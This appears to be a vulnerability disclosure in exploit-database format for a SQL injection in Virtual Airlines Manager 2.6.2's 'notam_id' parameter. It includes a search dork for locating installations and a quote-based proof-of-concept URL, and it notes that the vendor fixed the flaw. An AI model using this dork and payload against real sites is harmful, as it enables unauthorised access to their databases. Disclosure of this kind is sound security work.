23 lines
No EOL
561 B
Text
23 lines
No EOL
561 B
Text
# Exploit Title: Virtual Airlines Manager 2.6.2 - 'notam' SQL Injection
|
|
# Date: 2020-06-07
|
|
# Exploit Author: Pankaj Kumar Thakur
|
|
# Vendor Homepage: http://virtualairlinesmanager.net/
|
|
# Dork: inurl:notam_id=
|
|
# Affected Version: 2.6.2
|
|
# Tested on: Ubuntu
|
|
# CVE : N/A
|
|
|
|
Vulnerable parameter
|
|
-------------------
|
|
notam_id=%27%27
|
|
|
|
Id parameter's value is going into sql query directly!
|
|
|
|
Proof of concept
|
|
---------------
|
|
https://localhost:8080/vam/index.php?page=notam¬am_id=11%27%27
|
|
|
|
|
|
Submitted: Jun 1 2020
|
|
Fixed: Jun 5 2020
|
|
Acknowledgement : https://ibb.co/Y3WYdFN |